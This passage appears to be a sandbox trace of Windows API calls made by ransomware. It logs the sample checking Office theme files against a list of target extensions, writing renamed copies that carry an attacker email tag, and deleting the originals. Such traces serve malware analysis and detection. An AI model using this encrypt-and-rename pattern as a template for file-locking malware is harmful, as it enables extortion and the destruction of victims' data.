-1 [0269.464] lstrlenW (lpString=".docx") returned 5 [0269.464] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0269.464] lstrlenW (lpString=".pdf") returned 4 [0269.464] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0269.464] lstrlenW (lpString=".xls") returned 4 [0269.464] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0269.464] lstrlenW (lpString=".xlsx") returned 5 [0269.464] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0269.464] lstrlenW (lpString=".ppt") returned 4 [0269.464] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0269.464] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx") returned 78 [0269.464] lstrlenW (lpString=".zip") returned 4 [0269.464] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0269.464] lstrlenW (lpString=".rar") returned 4 [0269.464] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0269.464] lstrlenW (lpString=".bz2") returned 4 [0269.464] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0269.464] lstrlenW (lpString=".7z") returned 3 [0269.464] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0269.464] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx") returned 78 [0269.465] lstrlenW (lpString=".dbf") returned 4 [0269.465] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0269.465] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx") returned 78 [0269.465] lstrlenW (lpString=".1cd") returned 4 [0269.465] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0269.465] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx") returned 78 [0269.465] lstrlenW (lpString=".jpg") returned 4 [0269.465] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0269.465] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx") returned 78 [0269.465] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx") returned 78 [0269.465] lstrlenW (lpString=".doc") returned 4 [0269.465] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0269.465] lstrlenW (lpString=".docx") returned 5 [0269.465] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0269.465] lstrlenW (lpString=".pdf") returned 4 [0269.465] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0269.465] lstrlenW (lpString=".xls") returned 4 [0269.465] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0269.465] lstrlenW (lpString=".xlsx") returned 5 [0269.465] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0269.465] lstrlenW (lpString=".ppt") returned 4 [0269.465] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0269.465] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx") returned 78 [0269.465] lstrlenW (lpString=".zip") returned 4 [0269.465] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0269.465] lstrlenW (lpString=".rar") returned 4 [0269.465] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0269.465] lstrlenW (lpString=".bz2") returned 4 [0269.465] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0269.465] lstrlenW (lpString=".7z") returned 3 [0269.465] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0269.466] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx") returned 78 [0269.466] lstrlenW (lpString=".dbf") returned 4 [0269.466] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0269.466] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx") returned 78 [0269.466] lstrlenW (lpString=".1cd") returned 4 [0269.466] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0269.466] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx") returned 78 [0269.466] lstrlenW (lpString=".jpg") returned 4 [0269.466] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0269.466] lstrcmpiW (lpString1=".eftx", lpString2=".USA") returned -1 [0269.466] lstrlenW (lpString="Black Tie.eftx") returned 14 [0269.466] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\black tie.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0269.469] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x3a8ff1c | out: lpFileSize=0x3a8ff1c*=618119) returned 1 [0269.469] CloseHandle (hObject=0x3ac) returned 1 [0269.469] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\black tie.eftx")) returned 0x20 [0269.469] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\black tie.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0269.469] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\black tie.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0269.469] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.469] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.469] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\black tie.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0269.470] GetLastError () returned 0x0 [0269.470] ReadFile (in: hFile=0x3ac, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x96e87, lpOverlapped=0x0) returned 1 [0269.843] WriteFile (in: hFile=0x3b0, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0x96e90, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0x96e90, lpOverlapped=0x0) returned 1 [0269.854] ReadFile (in: hFile=0x3ac, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x0, lpOverlapped=0x0) returned 1 [0269.854] WriteFile (in: hFile=0x3b0, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0xf0, lpOverlapped=0x0) returned 1 [0269.854] SetEndOfFile (hFile=0x3b0) returned 1 [0269.854] CloseHandle (hObject=0x3b0) returned 1 [0269.854] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.855] SetEndOfFile (hFile=0x3ac) returned 1 [0269.872] CloseHandle (hObject=0x3ac) returned 1 [0269.872] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0269.930] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\black tie.eftx")) returned 1 [0269.930] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx") returned 81 [0269.930] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx") returned 81 [0269.930] lstrlenW (lpString=".doc") returned 4 [0269.930] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0269.931] lstrlenW (lpString=".docx") returned 5 [0269.931] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0269.931] lstrlenW (lpString=".pdf") returned 4 [0269.931] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0269.931] lstrlenW (lpString=".xls") returned 4 [0269.931] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0269.931] lstrlenW (lpString=".xlsx") returned 5 [0269.931] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0269.931] lstrlenW (lpString=".ppt") returned 4 [0269.931] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0269.931] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx") returned 81 [0269.931] lstrlenW (lpString=".zip") returned 4 [0269.931] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0269.931] lstrlenW (lpString=".rar") returned 4 [0269.931] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0269.931] lstrlenW (lpString=".bz2") returned 4 [0269.931] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0269.931] lstrlenW (lpString=".7z") returned 3 [0269.931] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0269.931] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx") returned 81 [0269.931] lstrlenW (lpString=".dbf") returned 4 [0269.931] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0269.931] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx") returned 81 [0269.931] lstrlenW (lpString=".1cd") returned 4 [0269.931] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0269.931] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx") returned 81 [0269.931] lstrlenW (lpString=".jpg") returned 4 [0269.932] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0269.932] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx") returned 81 [0269.932] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx") returned 81 [0269.932] lstrlenW (lpString=".doc") returned 4 [0269.932] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0269.932] lstrlenW (lpString=".docx") returned 5 [0269.932] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0269.932] lstrlenW (lpString=".pdf") returned 4 [0269.932] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0269.932] lstrlenW (lpString=".xls") returned 4 [0269.932] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0269.932] lstrlenW (lpString=".xlsx") returned 5 [0269.932] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0269.932] lstrlenW (lpString=".ppt") returned 4 [0269.932] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0269.932] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx") returned 81 [0269.932] lstrlenW (lpString=".zip") returned 4 [0269.932] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0269.932] lstrlenW (lpString=".rar") returned 4 [0269.932] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0269.932] lstrlenW (lpString=".bz2") returned 4 [0269.932] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0269.932] lstrlenW (lpString=".7z") returned 3 [0269.932] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0269.932] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx") returned 81 [0269.932] lstrlenW (lpString=".dbf") returned 4 [0269.932] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0269.932] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx") returned 81 [0269.932] lstrlenW (lpString=".1cd") returned 4 [0269.932] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0269.933] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx") returned 81 [0269.933] lstrlenW (lpString=".jpg") returned 4 [0269.933] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0269.933] lstrcmpiW (lpString1=".eftx", lpString2=".USA") returned -1 [0269.933] lstrlenW (lpString="Couture.eftx") returned 12 [0269.933] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\couture.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0270.348] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0x3a8ff1c | out: lpFileSize=0x3a8ff1c*=1967905) returned 1 [0270.357] CloseHandle (hObject=0x3a8) returned 1 [0270.359] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\couture.eftx")) returned 0x20 [0270.369] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\couture.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0270.374] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\couture.eftx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\couture.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0270.374] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx") returned 79 [0270.374] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx") returned 79 [0270.374] lstrlenW (lpString=".doc") returned 4 [0270.374] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0270.374] lstrlenW (lpString=".docx") returned 5 [0270.374] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0270.374] lstrlenW (lpString=".pdf") returned 4 [0270.374] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0270.374] lstrlenW (lpString=".xls") returned 4 [0270.374] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0270.374] lstrlenW (lpString=".xlsx") returned 5 [0270.374] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0270.374] lstrlenW (lpString=".ppt") returned 4 [0270.375] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0270.375] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx") returned 79 [0270.375] lstrlenW (lpString=".zip") returned 4 [0270.375] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0270.375] lstrlenW (lpString=".rar") returned 4 [0270.375] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0270.375] lstrlenW (lpString=".bz2") returned 4 [0270.375] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0270.375] lstrlenW (lpString=".7z") returned 3 [0270.375] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0270.375] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx") returned 79 [0270.375] lstrlenW (lpString=".dbf") returned 4 [0270.375] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0270.375] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx") returned 79 [0270.375] lstrlenW (lpString=".1cd") returned 4 [0270.375] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0270.375] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx") returned 79 [0270.375] lstrlenW (lpString=".jpg") returned 4 [0270.375] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0270.375] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx") returned 79 [0270.375] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx") returned 79 [0270.375] lstrlenW (lpString=".doc") returned 4 [0270.375] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0270.375] lstrlenW (lpString=".docx") returned 5 [0270.375] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0270.376] lstrlenW (lpString=".pdf") returned 4 [0270.376] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0270.376] lstrlenW (lpString=".xls") returned 4 [0270.376] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0270.376] lstrlenW (lpString=".xlsx") returned 5 [0270.376] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0270.376] lstrlenW (lpString=".ppt") returned 4 [0270.376] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0270.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx") returned 79 [0270.376] lstrlenW (lpString=".zip") returned 4 [0270.376] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0270.376] lstrlenW (lpString=".rar") returned 4 [0270.376] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0270.376] lstrlenW (lpString=".bz2") returned 4 [0270.376] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0270.376] lstrlenW (lpString=".7z") returned 3 [0270.376] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0270.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx") returned 79 [0270.376] lstrlenW (lpString=".dbf") returned 4 [0270.376] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0270.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx") returned 79 [0270.377] lstrlenW (lpString=".1cd") returned 4 [0270.377] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0270.377] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx") returned 79 [0270.377] lstrlenW (lpString=".jpg") returned 4 [0270.377] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0270.377] lstrcmpiW (lpString1=".eftx", lpString2=".USA") returned -1 [0270.377] lstrlenW (lpString="Flow.eftx") returned 9 [0270.377] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\flow.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0270.387] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x3a8ff1c | out: lpFileSize=0x3a8ff1c*=26648) returned 1 [0270.387] CloseHandle (hObject=0x348) returned 1 [0270.388] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\flow.eftx")) returned 0x20 [0270.736] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\flow.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0270.818] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\flow.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0270.818] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.818] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.818] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\flow.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0270.818] GetLastError () returned 0x0 [0270.818] ReadFile (in: hFile=0x348, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x6818, lpOverlapped=0x0) returned 1 [0270.851] WriteFile (in: hFile=0x394, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0x6820, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0x6820, lpOverlapped=0x0) returned 1 [0270.852] ReadFile (in: hFile=0x348, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x0, lpOverlapped=0x0) returned 1 [0270.852] WriteFile (in: hFile=0x394, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0270.852] SetEndOfFile (hFile=0x394) returned 1 [0270.852] CloseHandle (hObject=0x394) returned 1 [0270.852] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.852] SetEndOfFile (hFile=0x348) returned 1 [0270.855] CloseHandle (hObject=0x348) returned 1 [0270.855] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0270.866] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\flow.eftx")) returned 1 [0271.013] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx") returned 76 [0271.013] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx") returned 76 [0271.013] lstrlenW (lpString=".doc") returned 4 [0271.013] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0271.013] lstrlenW (lpString=".docx") returned 5 [0271.013] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0271.013] lstrlenW (lpString=".pdf") returned 4 [0271.014] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0271.014] lstrlenW (lpString=".xls") returned 4 [0271.014] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0271.014] lstrlenW (lpString=".xlsx") returned 5 [0271.014] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0271.014] lstrlenW (lpString=".ppt") returned 4 [0271.014] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0271.014] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx") returned 76 [0271.014] lstrlenW (lpString=".zip") returned 4 [0271.014] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0271.014] lstrlenW (lpString=".rar") returned 4 [0271.014] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0271.014] lstrlenW (lpString=".bz2") returned 4 [0271.014] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0271.014] lstrlenW (lpString=".7z") returned 3 [0271.014] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0271.014] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx") returned 76 [0271.014] lstrlenW (lpString=".dbf") returned 4 [0271.014] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0271.014] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx") returned 76 [0271.014] lstrlenW (lpString=".1cd") returned 4 [0271.014] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0271.014] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx") returned 76 [0271.014] lstrlenW (lpString=".jpg") returned 4 [0271.014] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0271.014] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx") returned 76 [0271.014] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx") returned 76 [0271.014] lstrlenW (lpString=".doc") returned 4 [0271.014] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0271.015] lstrlenW (lpString=".docx") returned 5 [0271.015] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0271.015] lstrlenW (lpString=".pdf") returned 4 [0271.015] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0271.015] lstrlenW (lpString=".xls") returned 4 [0271.015] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0271.015] lstrlenW (lpString=".xlsx") returned 5 [0271.015] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0271.015] lstrlenW (lpString=".ppt") returned 4 [0271.015] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0271.015] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx") returned 76 [0271.015] lstrlenW (lpString=".zip") returned 4 [0271.015] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0271.015] lstrlenW (lpString=".rar") returned 4 [0271.015] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0271.015] lstrlenW (lpString=".bz2") returned 4 [0271.015] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0271.015] 